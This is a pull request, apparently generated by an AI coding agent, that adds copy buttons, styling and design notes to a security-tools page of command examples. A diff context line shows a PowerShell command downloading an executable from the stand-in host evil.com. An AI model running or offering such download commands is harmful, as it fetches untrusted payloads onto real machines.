### PR TITLE
🎨 Palette: Add copy buttons to command flags in tools.html

### DIFF
--- a/.Jules/palette.md
+++ b/.Jules/palette.md
@@ -9,3 +9,11 @@
 ## 2026-02-14 - Keyboard Shortcut Discoverability
 **Learning:** Adding keyboard shortcuts (like '/' for search) significantly improves power-user experience, but they are useless if invisible. Updating the placeholder text to include the shortcut (e.g., "Press '/'") is a simple, zero-layout-shift way to boost discoverability.
 **Action:** Always pair keyboard shortcuts with a visual indicator, such as a tooltip or placeholder text, to ensure users know they exist.
+
+## 2024-05-24 - Interactive DOM Injection for Static Sites
+**Learning:** Static sites often lack interactivity for text-heavy content like code blocks. Injecting UI elements (like copy buttons) via JavaScript at runtime is a lightweight way to add significant value without complex build steps or framework overhead.
+**Action:** When enhancing static documentation, look for structured text patterns (like command blocks) that can be wrapped and augmented with interactive controls using `document.createDocumentFragment`.
+
+## 2024-05-24 - Race Conditions in Timed Feedback
+**Learning:** When implementing "Copied!" feedback with a timeout to restore the original icon, rapid user interaction can capture the temporary "success" state as the "original" state if not careful, leading to a broken UI state.
+**Action:** Always store the true original state (e.g., the icon SVG) in a constant or variable outside the event handler scope, rather than reading it from the DOM at the moment of interaction.

--- a/css/style.css
+++ b/css/style.css
@@ -404,3 +404,52 @@ code {
     grid-column: 1 / -1;
     font-size: 1.1rem;
 }
+
+/* Palette: Copy Command Styles */
+.command-wrapper {
+    display: flex;
+    justify-content: space-between;
+    align-items: center;
+    background: rgba(0, 0, 0, 0.3);
+    border: 1px solid var(--border-color);
+    border-radius: 4px;
+    padding: 0.5rem;
+    margin: 0.5rem 0;
+}
+
+.command-code {
+    font-family: ui-monospace, SFMono-Regular, monospace;
+    color: var(--text-color);
+    white-space: pre-wrap;
+    margin-right: 1rem;
+    flex-grow: 1;
+    word-break: break-all;
+}
+
+.copy-btn {
+    background: transparent;
+    border: 1px solid var(--border-color);
+    color: var(--text-color);
+    cursor: pointer;
+    padding: 0.4rem;
+    border-radius: 4px;
+    font-size: 1rem;
+    line-height: 1;
+    transition: all 0.2s;
+    display: flex;
+    align-items: center;
+    justify-content: center;
+    width: 32px;
+    height: 32px;
+}
+
+.copy-btn:hover {
+    background: var(--accent-color);
+    color: #0d1117;
+    border-color: var(--accent-color);
+}
+
+.copy-btn:focus-visible {
+    outline: 2px solid var(--accent-color);
+    outline-offset: 2px;
+}

--- a/tools.html
+++ b/tools.html
@@ -426,6 +426,53 @@ Invoke-WebRequest -Uri "http://evil.com/file.exe" -OutFile "C:\Temp\file.exe"
             searchInput.focus();
         }
     });
+
+    // Palette: Copy Command Functionality
+    document.querySelectorAll('.tool-flags').forEach(container => {
+        const fragment = document.createDocumentFragment();
+        container.childNodes.forEach(node => {
+            // Check for text nodes that are not just whitespace
+            if (node.nodeType === Node.TEXT_NODE && node.textContent.trim().length > 0) {
+                const wrapper = document.createElement('div');
+                wrapper.className = 'command-wrapper';
+
+                const code = document.createElement('code');
+                code.className = 'command-code';
+                code.textContent = node.textContent.trim();
+
+                const btn = document.createElement('button');
+                btn.className = 'copy-btn';
+                btn.setAttribute('aria-label', 'Copy command');
+
+                const clipboardIcon = '<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><rect x="9" y="9" width="13" height="13" rx="2" ry="2"></rect><path d="M5 15H4a2 2 0 0 1-2-2V4a2 2 0 0 1 2-2h9a2 2 0 0 1 2 2v1"></path></svg>';
+                const checkmarkIcon = '<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><polyline points="20 6 9 17 4 12"></polyline></svg>';
+
+                btn.innerHTML = clipboardIcon;
+
+                btn.onclick = () => {
+                    navigator.clipboard.writeText(code.textContent).then(() => {
+                        btn.innerHTML = checkmarkIcon;
+                        btn.classList.add('copied');
+                        setTimeout(() => {
+                            btn.innerHTML = clipboardIcon;
+                            btn.classList.remove('copied');
+                        }, 2000);
+                    });
+                };
+
+                wrapper.appendChild(code);
+                wrapper.appendChild(btn);
+                fragment.appendChild(wrapper);
+            } else {
+                if (node.nodeType !== Node.TEXT_NODE) {
+                    fragment.appendChild(node.cloneNode(true));
+                }
+            }
+        });
+
+        container.innerHTML = '';
+        container.appendChild(fragment);
+    });
   </script>
 </body>
 </html>


### PR DESCRIPTION
💡 What: Added copy-to-clipboard buttons for all command flags in the tools list.
🎯 Why: Improves usability for security professionals who need to quickly copy commands.
📸 Before/After: Added interactive copy buttons next to command blocks.
♿ Accessibility: Buttons have aria-labels and focus states.
Note: Fixed a race condition where rapid clicking could permanently change the icon.

---
*PR created automatically by Jules for task [8120349817177975629](https://jules.google.com/task/8120349817177975629) started by @PietjePuh*